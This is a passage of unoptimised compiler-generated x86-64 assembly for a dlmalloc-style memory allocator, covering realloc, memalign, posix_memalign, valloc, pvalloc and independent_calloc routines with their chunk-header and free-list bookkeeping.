movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -104(%rbp)
movq -48(%rbp), %rax
addq -104(%rbp), %rax
cmpq -24(%rbp), %rax
jb LBB9_21
## %bb.17:
movq -48(%rbp), %rax
addq -104(%rbp), %rax
subq -24(%rbp), %rax
movq %rax, -112(%rbp)
cmpq $32, -112(%rbp)
jb LBB9_19
## %bb.18:
movq -16(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -120(%rbp)
movq -120(%rbp), %rax
addq -112(%rbp), %rax
movq %rax, -128(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -24(%rbp), %rcx
orq $2, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -112(%rbp), %rcx
orq $1, %rcx
movq -120(%rbp), %rax
movq %rcx, 8(%rax)
movq -112(%rbp), %rdx
movq -120(%rbp), %rax
movq -112(%rbp), %rcx
movq %rdx, (%rax,%rcx)
movq -128(%rbp), %rax
movq 8(%rax), %rcx
andq $-2, %rcx
movq %rcx, 8(%rax)
movq -112(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 8(%rax)
movq -120(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 32(%rax)
jmp LBB9_20
LBB9_19:
movq -48(%rbp), %rax
addq -104(%rbp), %rax
movq %rax, -136(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -136(%rbp), %rcx
orq $2, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -16(%rbp), %rax
movq -136(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -8(%rbp), %rax
movq $0, 8(%rax)
movq -8(%rbp), %rax
movq $0, 32(%rax)
LBB9_20:
movq -16(%rbp), %rax
movq %rax, -40(%rbp)
LBB9_21:
jmp LBB9_98
LBB9_22:
movq -56(%rbp), %rax
movq 8(%rax), %rax
andq $2, %rax
cmpq $0, %rax
jne LBB9_97
## %bb.23:
movq -56(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -144(%rbp)
movq -48(%rbp), %rax
addq -144(%rbp), %rax
cmpq -24(%rbp), %rax
jb LBB9_96
## %bb.24:
movq -48(%rbp), %rax
addq -144(%rbp), %rax
subq -24(%rbp), %rax
movq %rax, -152(%rbp)
movq -144(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB9_43
## %bb.25:
movq -56(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -160(%rbp)
movq -56(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -168(%rbp)
movq -144(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -172(%rbp)
movq -160(%rbp), %rcx
movq -8(%rbp), %rdx
addq $72, %rdx
movl -172(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -266(%rbp) ## 1-byte Spill
je LBB9_29
## %bb.26:
movq -160(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -267(%rbp) ## 1-byte Spill
jb LBB9_28
## %bb.27:
movq -160(%rbp), %rax
movq 24(%rax), %rax
cmpq -56(%rbp), %rax
sete %al
movb %al, -267(%rbp) ## 1-byte Spill
LBB9_28:
movb -267(%rbp), %al ## 1-byte Reload
movb %al, -266(%rbp) ## 1-byte Spill
LBB9_29:
movb -266(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB9_41
## %bb.30:
movq -168(%rbp), %rax
cmpq -160(%rbp), %rax
jne LBB9_32
## %bb.31:
movl -172(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -8(%rbp), %rax
andl (%rax), %ecx
movl %ecx, (%rax)
jmp LBB9_40
LBB9_32:
movq -168(%rbp), %rcx
movq -8(%rbp), %rdx
addq $72, %rdx
movl -172(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -268(%rbp) ## 1-byte Spill
je LBB9_36
## %bb.33:
movq -168(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -269(%rbp) ## 1-byte Spill
jb LBB9_35
## %bb.34:
movq -168(%rbp), %rax
movq 16(%rax), %rax
cmpq -56(%rbp), %rax
sete %al
movb %al, -269(%rbp) ## 1-byte Spill
LBB9_35:
movb -269(%rbp), %al ## 1-byte Reload
movb %al, -268(%rbp) ## 1-byte Spill
LBB9_36:
movb -268(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB9_38
## %bb.37:
movq -168(%rbp), %rcx
movq -160(%rbp), %rax
movq %rcx, 24(%rax)
movq -160(%rbp), %rcx
movq -168(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB9_39
LBB9_38:
callq _abort
LBB9_39:
jmp LBB9_40
LBB9_40:
jmp LBB9_42
LBB9_41:
callq _abort
LBB9_42:
jmp LBB9_92
LBB9_43:
movq -56(%rbp), %rax
movq %rax, -184(%rbp)
movq -184(%rbp), %rax
movq 48(%rax), %rax
movq %rax, -192(%rbp)
movq -184(%rbp), %rax
movq 24(%rax), %rax
cmpq -184(%rbp), %rax
je LBB9_51
## %bb.44:
movq -184(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -208(%rbp)
movq -184(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -200(%rbp)
movq -208(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -270(%rbp) ## 1-byte Spill
jb LBB9_47
## %bb.45:
movq -208(%rbp), %rax
movq 24(%rax), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq -184(%rbp), %rcx
movb %al, -270(%rbp) ## 1-byte Spill
jne LBB9_47
## %bb.46:
movq -200(%rbp), %rax
movq 16(%rax), %rax
cmpq -184(%rbp), %rax
sete %al
movb %al, -270(%rbp) ## 1-byte Spill
LBB9_47:
movb -270(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB9_49
## %bb.48:
movq -200(%rbp), %rcx
movq -208(%rbp), %rax
movq %rcx, 24(%rax)
movq -208(%rbp), %rcx
movq -200(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB9_50
LBB9_49:
callq _abort
LBB9_50:
jmp LBB9_63
LBB9_51:
movq -184(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
addq $8, %rcx
movq %rcx, -216(%rbp)
movq 40(%rax), %rax
movq %rax, -200(%rbp)
cmpq $0, %rax
jne LBB9_53
## %bb.52:
movq -184(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -216(%rbp)
movq 32(%rax), %rax
movq %rax, -200(%rbp)
cmpq $0, %rax
je LBB9_62
LBB9_53:
jmp LBB9_54
LBB9_54: ## =>This Inner Loop Header: Depth=1
movq -200(%rbp), %rcx
movq %rcx, %rax
addq $32, %rax
addq $8, %rax
movq %rax, -224(%rbp)
movb $1, %al
cmpq $0, 40(%rcx)
movb %al, -271(%rbp) ## 1-byte Spill
jne LBB9_56
## %bb.55: ## in Loop: Header=BB9_54 Depth=1
movq -200(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -224(%rbp)
cmpq $0, 32(%rax)
setne %al
movb %al, -271(%rbp) ## 1-byte Spill
LBB9_56: ## in Loop: Header=BB9_54 Depth=1
movb -271(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB9_57
jmp LBB9_58
LBB9_57: ## in Loop: Header=BB9_54 Depth=1
movq -224(%rbp), %rax
movq %rax, -216(%rbp)
movq (%rax), %rax
movq %rax, -200(%rbp)
jmp LBB9_54
LBB9_58:
movq -216(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB9_60
## %bb.59:
movq -216(%rbp), %rax
movq $0, (%rax)
jmp LBB9_61
LBB9_60:
callq _abort
LBB9_61:
jmp LBB9_62
LBB9_62:
jmp LBB9_63
LBB9_63:
cmpq $0, -192(%rbp)
je LBB9_91
## %bb.64:
movq -8(%rbp), %rax
addq $600, %rax ## imm = 0x258
movq -184(%rbp), %rcx
movl 56(%rcx), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -232(%rbp)
movq -184(%rbp), %rax
movq -232(%rbp), %rcx
cmpq (%rcx), %rax
jne LBB9_68
## %bb.65:
movq -200(%rbp), %rax
movq -232(%rbp), %rcx
movq %rax, (%rcx)
cmpq $0, %rax
jne LBB9_67
## %bb.66:
movq -184(%rbp), %rax
movl 56(%rax), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -8(%rbp), %rax
andl 4(%rax), %ecx
movl %ecx, 4(%rax)
LBB9_67:
jmp LBB9_75
LBB9_68:
movq -192(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB9_73
## %bb.69:
movq -192(%rbp), %rax
movq 32(%rax), %rax
cmpq -184(%rbp), %rax
jne LBB9_71
## %bb.70:
movq -200(%rbp), %rcx
movq -192(%rbp), %rax
movq %rcx, 32(%rax)
jmp LBB9_72
LBB9_71:
movq -200(%rbp), %rcx
movq -192(%rbp), %rax
movq %rcx, 40(%rax)
LBB9_72:
jmp LBB9_74
LBB9_73:
callq _abort
LBB9_74:
jmp LBB9_75
LBB9_75:
cmpq $0, -200(%rbp)
je LBB9_90
## %bb.76:
movq -200(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB9_88
## %bb.77:
movq -192(%rbp), %rcx
movq -200(%rbp), %rax
movq %rcx, 48(%rax)
movq -184(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -240(%rbp)
cmpq $0, %rax
je LBB9_82
## %bb.78:
movq -240(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB9_80
## %bb.79:
movq -240(%rbp), %rcx
movq -200(%rbp), %rax
movq %rcx, 32(%rax)
movq -200(%rbp), %rcx
movq -240(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB9_81
LBB9_80:
callq _abort
LBB9_81:
jmp LBB9_82
LBB9_82:
movq -184(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -248(%rbp)
cmpq $0, %rax
je LBB9_87
## %bb.83:
movq -248(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB9_85
## %bb.84:
movq -248(%rbp), %rcx
movq -200(%rbp), %rax
movq %rcx, 40(%rax)
movq -200(%rbp), %rcx
movq -248(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB9_86
LBB9_85:
callq _abort
LBB9_86:
jmp LBB9_87
LBB9_87:
jmp LBB9_89
LBB9_88:
callq _abort
LBB9_89:
jmp LBB9_90
LBB9_90:
jmp LBB9_91
LBB9_91:
jmp LBB9_92
LBB9_92:
cmpq $32, -152(%rbp)
jae LBB9_94
## %bb.93:
movq -48(%rbp), %rax
addq -144(%rbp), %rax
movq %rax, -256(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -256(%rbp), %rcx
orq $2, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -16(%rbp), %rax
movq -256(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
jmp LBB9_95
LBB9_94:
movq -16(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -264(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -24(%rbp), %rcx
orq $2, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -264(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -152(%rbp), %rcx
orq $2, %rcx
movq -264(%rbp), %rax
movq %rcx, 8(%rax)
movq -264(%rbp), %rax
movq -152(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -8(%rbp), %rdi
movq -264(%rbp), %rsi
movq -152(%rbp), %rdx
callq _dispose_chunk
LBB9_95:
movq -16(%rbp), %rax
movq %rax, -40(%rbp)
LBB9_96:
jmp LBB9_97
LBB9_97:
jmp LBB9_98
LBB9_98:
jmp LBB9_99
LBB9_99:
jmp LBB9_100
LBB9_100:
jmp LBB9_101
LBB9_101:
jmp LBB9_103
LBB9_102:
callq _abort
LBB9_103:
movq -40(%rbp), %rax
addq $272, %rsp ## imm = 0x110
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _realloc_in_place ## -- Begin function realloc_in_place
.p2align 4, 0x90
_realloc_in_place: ## @realloc_in_place
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq $0, -24(%rbp)
cmpq $0, -8(%rbp)
je LBB10_10
## %bb.1:
cmpq $-128, -16(%rbp)
jb LBB10_3
## %bb.2:
callq ___error
movl $12, (%rax)
jmp LBB10_9
LBB10_3:
cmpq $23, -16(%rbp)
jae LBB10_5
## %bb.4:
movl $32, %eax
movq %rax, -64(%rbp) ## 8-byte Spill
jmp LBB10_6
LBB10_5:
movq -16(%rbp), %rax
addq $8, %rax
addq $15, %rax
andq $-16, %rax
movq %rax, -64(%rbp) ## 8-byte Spill
LBB10_6:
movq -64(%rbp), %rax ## 8-byte Reload
movq %rax, -32(%rbp)
movq -8(%rbp), %rax
addq $-16, %rax
movq %rax, -40(%rbp)
leaq __gm_(%rip), %rax
movq %rax, -48(%rbp)
movq -48(%rbp), %rdi
movq -40(%rbp), %rsi
movq -32(%rbp), %rdx
xorl %ecx, %ecx
callq _try_realloc_chunk
movq %rax, -56(%rbp)
movq -56(%rbp), %rax
cmpq -40(%rbp), %rax
jne LBB10_8
## %bb.7:
movq -8(%rbp), %rax
movq %rax, -24(%rbp)
LBB10_8:
jmp LBB10_9
LBB10_9:
jmp LBB10_10
LBB10_10:
movq -24(%rbp), %rax
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _memalign ## -- Begin function memalign
.p2align 4, 0x90
_memalign: ## @memalign
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
cmpq $16, -16(%rbp)
ja LBB11_2
## %bb.1:
movq -24(%rbp), %rdi
callq _malloc
movq %rax, -8(%rbp)
jmp LBB11_3
LBB11_2:
movq -16(%rbp), %rsi
movq -24(%rbp), %rdx
leaq __gm_(%rip), %rdi
callq _internal_memalign
movq %rax, -8(%rbp)
LBB11_3:
movq -8(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function internal_memalign
_internal_memalign: ## @internal_memalign
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $144, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq $0, -32(%rbp)
cmpq $32, -16(%rbp)
jae LBB12_2
## %bb.1:
movq $32, -16(%rbp)
LBB12_2:
movq -16(%rbp), %rax
movq -16(%rbp), %rcx
subq $1, %rcx
andq %rcx, %rax
cmpq $0, %rax
je LBB12_7
## %bb.3:
movq $32, -40(%rbp)
LBB12_4: ## =>This Inner Loop Header: Depth=1
movq -40(%rbp), %rax
cmpq -16(%rbp), %rax
jae LBB12_6
## %bb.5: ## in Loop: Header=BB12_4 Depth=1
movq -40(%rbp), %rax
shlq $1, %rax
movq %rax, -40(%rbp)
jmp LBB12_4
LBB12_6:
movq -40(%rbp), %rax
movq %rax, -16(%rbp)
LBB12_7:
movq -24(%rbp), %rax
movq $-128, %rcx
subq -16(%rbp), %rcx
cmpq %rcx, %rax
jb LBB12_11
## %bb.8:
cmpq $0, -8(%rbp)
je LBB12_10
## %bb.9:
callq ___error
movl $12, (%rax)
LBB12_10:
jmp LBB12_29
LBB12_11:
cmpq $23, -24(%rbp)
jae LBB12_13
## %bb.12:
movl $32, %eax
movq %rax, -136(%rbp) ## 8-byte Spill
jmp LBB12_14
LBB12_13:
movq -24(%rbp), %rax
addq $8, %rax
addq $15, %rax
andq $-16, %rax
movq %rax, -136(%rbp) ## 8-byte Spill
LBB12_14:
movq -136(%rbp), %rax ## 8-byte Reload
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
addq -16(%rbp), %rax
addq $32, %rax
subq $8, %rax
movq %rax, -56(%rbp)
movq -56(%rbp), %rdi
callq _malloc
movq %rax, -32(%rbp)
cmpq $0, -32(%rbp)
je LBB12_28
## %bb.15:
movq -32(%rbp), %rax
addq $-16, %rax
movq %rax, -64(%rbp)
movq -32(%rbp), %rax
movq -16(%rbp), %rcx
subq $1, %rcx
andq %rcx, %rax
cmpq $0, %rax
je LBB12_23
## %bb.16:
movq -32(%rbp), %rax
addq -16(%rbp), %rax
addq $-1, %rax
xorl %ecx, %ecx
## kill: def $rcx killed $ecx
subq -16(%rbp), %rcx
andq %rcx, %rax
addq $-16, %rax
movq %rax, -72(%rbp)
movq -72(%rbp), %rax
movq -64(%rbp), %rcx
subq %rcx, %rax
cmpq $32, %rax
jb LBB12_18
## %bb.17:
movq -72(%rbp), %rax
movq %rax, -144(%rbp) ## 8-byte Spill
jmp LBB12_19
LBB12_18:
movq -72(%rbp), %rax
addq -16(%rbp), %rax
movq %rax, -144(%rbp) ## 8-byte Spill
LBB12_19:
movq -144(%rbp), %rax ## 8-byte Reload
movq %rax, -80(%rbp)
movq -80(%rbp), %rax
movq %rax, -88(%rbp)
movq -80(%rbp), %rax
movq -64(%rbp), %rcx
subq %rcx, %rax
movq %rax, -96(%rbp)
movq -64(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
subq -96(%rbp), %rax
movq %rax, -104(%rbp)
movq -64(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $0, %rax
jne LBB12_21
## %bb.20:
movq -64(%rbp), %rax
movq (%rax), %rcx
addq -96(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, (%rax)
movq -104(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 8(%rax)
jmp LBB12_22
LBB12_21:
movq -88(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -104(%rbp), %rcx
orq $2, %rcx
movq -88(%rbp), %rax
movq %rcx, 8(%rax)
movq -88(%rbp), %rax
movq -104(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -64(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -96(%rbp), %rcx
orq $2, %rcx
movq -64(%rbp), %rax
movq %rcx, 8(%rax)
movq -64(%rbp), %rax
movq -96(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -8(%rbp), %rdi
movq -64(%rbp), %rsi
movq -96(%rbp), %rdx
callq _dispose_chunk
LBB12_22:
movq -88(%rbp), %rax
movq %rax, -64(%rbp)
LBB12_23:
movq -64(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $0, %rax
je LBB12_27
## %bb.24:
movq -64(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -112(%rbp)
movq -112(%rbp), %rax
movq -48(%rbp), %rcx
addq $32, %rcx
cmpq %rcx, %rax
jbe LBB12_26
## %bb.25:
movq -112(%rbp), %rax
subq -48(%rbp), %rax
movq %rax, -120(%rbp)
movq -64(%rbp), %rax
addq -48(%rbp), %rax
movq %rax, -128(%rbp)
movq -64(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -48(%rbp), %rcx
orq $2, %rcx
movq -64(%rbp), %rax
movq %rcx, 8(%rax)
movq -64(%rbp), %rax
movq -48(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -128(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -120(%rbp), %rcx
orq $2, %rcx
movq -128(%rbp), %rax
movq %rcx, 8(%rax)
movq -128(%rbp), %rax
movq -120(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -8(%rbp), %rdi
movq -128(%rbp), %rsi
movq -120(%rbp), %rdx
callq _dispose_chunk
LBB12_26:
jmp LBB12_27
LBB12_27:
movq -64(%rbp), %rax
addq $16, %rax
movq %rax, -32(%rbp)
LBB12_28:
jmp LBB12_29
LBB12_29:
movq -32(%rbp), %rax
addq $144, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _posix_memalign ## -- Begin function posix_memalign
.p2align 4, 0x90
_posix_memalign: ## @posix_memalign
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq %rdx, -32(%rbp)
movq $0, -40(%rbp)
cmpq $16, -24(%rbp)
jne LBB13_2
## %bb.1:
movq -32(%rbp), %rdi
callq _malloc
movq %rax, -40(%rbp)
jmp LBB13_12
LBB13_2:
movq -24(%rbp), %rax
shrq $3, %rax
movq %rax, -48(%rbp)
movq -24(%rbp), %rax
andq $7, %rax
movq %rax, -56(%rbp)
cmpq $0, -56(%rbp)
jne LBB13_5
## %bb.3:
cmpq $0, -48(%rbp)
je LBB13_5
## %bb.4:
movq -48(%rbp), %rax
movq -48(%rbp), %rcx
subq $1, %rcx
andq %rcx, %rax
cmpq $0, %rax
je LBB13_6
LBB13_5:
movl $22, -4(%rbp)
jmp LBB13_15
LBB13_6:
movq -32(%rbp), %rax
movq $-128, %rcx
subq -24(%rbp), %rcx
cmpq %rcx, %rax
ja LBB13_10
## %bb.7:
cmpq $32, -24(%rbp)
jae LBB13_9
## %bb.8:
movq $32, -24(%rbp)
LBB13_9:
movq -24(%rbp), %rsi
movq -32(%rbp), %rdx
leaq __gm_(%rip), %rdi
callq _internal_memalign
movq %rax, -40(%rbp)
LBB13_10:
jmp LBB13_11
LBB13_11:
jmp LBB13_12
LBB13_12:
cmpq $0, -40(%rbp)
jne LBB13_14
## %bb.13:
movl $12, -4(%rbp)
jmp LBB13_15
LBB13_14:
movq -40(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, (%rax)
movl $0, -4(%rbp)
LBB13_15:
movl -4(%rbp), %eax
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _valloc ## -- Begin function valloc
.p2align 4, 0x90
_valloc: ## @valloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movb $1, %al
cmpq $0, _mparams(%rip)
movb %al, -17(%rbp) ## 1-byte Spill
jne LBB14_2
## %bb.1:
callq _init_mparams
cmpl $0, %eax
setne %al
movb %al, -17(%rbp) ## 1-byte Spill
LBB14_2:
movb -17(%rbp), %al ## 1-byte Reload
movq _mparams+8(%rip), %rax
movq %rax, -16(%rbp)
movq -16(%rbp), %rdi
movq -8(%rbp), %rsi
callq _memalign
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function init_mparams
_init_mparams: ## @init_mparams
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
cmpq $0, _mparams(%rip)
jne LBB15_5
## %bb.1:
movq $4096, -16(%rbp) ## imm = 0x1000
movq -16(%rbp), %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movq -24(%rbp), %rcx
subq $1, %rcx
andq %rcx, %rax
cmpq $0, %rax
jne LBB15_3
## %bb.2:
movq -16(%rbp), %rax
movq -16(%rbp), %rcx
subq $1, %rcx
andq %rcx, %rax
cmpq $0, %rax
je LBB15_4
LBB15_3:
callq _abort
LBB15_4:
movq -24(%rbp), %rax
movq %rax, _mparams+16(%rip)
movq -16(%rbp), %rax
movq %rax, _mparams+8(%rip)
movq $262144, _mparams+24(%rip) ## imm = 0x40000
movq $2097152, _mparams+32(%rip) ## imm = 0x200000
movl $1, _mparams+40(%rip)
movl _mparams+40(%rip), %eax
movl %eax, __gm_+880(%rip)
xorl %eax, %eax
movl %eax, %edi
callq _time
xorq $1431655765, %rax ## imm = 0x55555555
movq %rax, -8(%rbp)
movq -8(%rbp), %rax
orq $8, %rax
movq %rax, -8(%rbp)
movq -8(%rbp), %rax
andq $-8, %rax
movq %rax, -8(%rbp)
movq -8(%rbp), %rax
movq %rax, _mparams(%rip)
LBB15_5:
movl $1, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _pvalloc ## -- Begin function pvalloc
.p2align 4, 0x90
_pvalloc: ## @pvalloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movb $1, %al
cmpq $0, _mparams(%rip)
movb %al, -17(%rbp) ## 1-byte Spill
jne LBB16_2
## %bb.1:
callq _init_mparams
cmpl $0, %eax
setne %al
movb %al, -17(%rbp) ## 1-byte Spill
LBB16_2:
movb -17(%rbp), %al ## 1-byte Reload
movq _mparams+8(%rip), %rax
movq %rax, -16(%rbp)
movq -16(%rbp), %rdi
movq -8(%rbp), %rsi
addq -16(%rbp), %rsi
subq $1, %rsi
movq -16(%rbp), %rax
subq $1, %rax
xorq $-1, %rax
andq %rax, %rsi
callq _memalign
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _independent_calloc ## -- Begin function independent_calloc
.p2align 4, 0x90
_independent_calloc: ## @independent_calloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq -16(%rbp), %rax
movq %rax, -32(%rbp)
movq -8(%rbp), %rsi
movq -24(%rbp), %r8
leaq __gm_(%rip), %rdi
leaq -32(%rbp), %rdx
movl $3, %ecx
callq _ialloc
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function ialloc
_ialloc: ## @ialloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $192, %rsp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq %rdx, -32(%rbp)
movl %ecx, -36(%rbp)
movq %r8, -48(%rbp)
movb $1, %al
cmpq $0, _mparams(%rip)
movb %al, -145(%rbp) ## 1-byte Spill
jne LBB18_2
## %bb.1:
callq _init_mparams
cmpl $0, %eax
setne %al
movb %al, -145(%rbp) ## 1-byte Spill
LBB18_2:
movb -145(%rbp), %al ## 1-byte Reload
cmpq $0, -48(%rbp)
je LBB18_6
## %bb.3:
cmpq $0, -24(%rbp)
jne LBB18_5
## %bb.4:
movq -48(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB18_46
LBB18_5:
movq -48(%rbp), %rax
movq %rax, -104(%rbp)
movq $0, -72(%rbp)
jmp LBB18_12
LBB18_6:
cmpq $0, -24(%rbp)
jne LBB18_8
## %bb.7:
xorl %eax, %eax
movl %eax, %edi
callq _malloc
movq %rax, -8(%rbp)
jmp LBB18_46
LBB18_8:
movq $0, -104(%rbp)
movq -24(%rbp), %rax
shlq $3, %rax
cmpq $23, %rax
jae LBB18_10
## %bb.9:
movl $32, %eax
movq %rax, -160(%rbp) ## 8-byte Spill
